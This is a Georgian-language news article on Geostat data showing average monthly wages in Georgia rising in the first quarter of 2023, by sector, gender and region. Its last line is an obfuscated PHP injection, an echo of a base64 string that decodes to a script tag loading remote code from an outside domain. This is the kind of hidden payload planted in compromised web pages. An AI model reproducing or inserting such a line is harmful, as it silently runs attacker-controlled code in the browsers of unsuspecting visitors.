celsiusi
ავერსი საქკაბელი

სტატისტიკის ეროვნული სამსახურის ინფორმაციით, 2023 წლის პირველ კვარტალში საქართველოში საშუალო თვიური ნომინალური ხელფასი, გასული წლის შესაბამის პერიოდთან შედარებით, 18.7 პროცენტით, ანუ 270.1 ლარით გაიზარდა და 1 716.6 ლარი შეადგინა.

საქმიანობის სახეების მიხედვით შედარებით მაღალი ხელფასი დაფიქსირდა შემდეგ დარგებში: საფინანსო და სადაზღვევო საქმიანობები – 3 761.1 ლარი, რაც წინა წლის შესაბამის პერიოდთან შედარებით 23.8 პროცენტით მეტია. ინფორმაცია და კომუნიკაცია – 3 631.3 ლარი, ზრდამ 55.2 პროცენტი შეადგინა. პროფესიული, სამეცნიერო და ტექნიკური საქმიანობები – 2 386.8 ლარი, გაიზარდა 21.6 პროცენტით. მშენებლობა – 2 145.5 ლარი, გაიზარდა 14.7 პროცენტით.

ამასთან, საქსტატის ცნობით, 2023 წლის პირველ კვარტალში ქალების საშუალო ხელფასი 1 375.7 ლარით, ხოლო კაცების – 2 053.4 ლარით განისაზღვრა. ხელფასების წლიურმა ზრდამ ქალებში 190.9 ლარი, ანუ 16.1% შეადგინა, ხოლო კაცებში – 358.1 ლარი, რაც 21.1%-ით მეტია გასული წლის იმავე პერიოდთან შედარებით.

საქმიანობის სახეების მიხედვით კაცების ხელფასი თითქმის ყველა სექტორში აღემატებოდა ქალების ხელფასს.

საანგარიშო პერიოდში დაქირავებით დასაქმებულთა საშუალო თვიური ხელფასი ბიზნესსექტორში 279.4 ლარით, ანუ 18.9%-ით გაიზარდა და 1 759.1 ლარი შეადგინა. საქმიანობის სახეების მიხედვით ყველაზე მაღალი ხელფასი 3 740.2 ლარი, ინფორმაციისა და კომუნიკაციის, ასევე ხელოვნების, გართობისა და დასვენების (2 832.9 ლარი) დარგებში ფიქსირდება.

უწყების ანგარიშის მიხედვით, 2023 წლის პირველ კვარტალში არასამეწარმეო და საფინანსო სექტორში საშუალო თვიური ხელფასი გასული წლის შესაბამის პერიოდთან შედარებით 252.4 ლარით, ანუ 18.1%-ით გაიზარდა და 1 643.2 ლარი შეადგინა. საქმიანობის სახეების მიხედვით შედარებით მაღალი საშუალო ხელფასი აქვთ საფინანსო და სადაზღვევო საქმიანობებში დასაქმებულებს.

საშუალო ხელფასის სიდიდის მიხედვით რეგიონებში ლიდერობს თბილისი და მცხეთა-მთიანეთის რეგიონი.

421
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");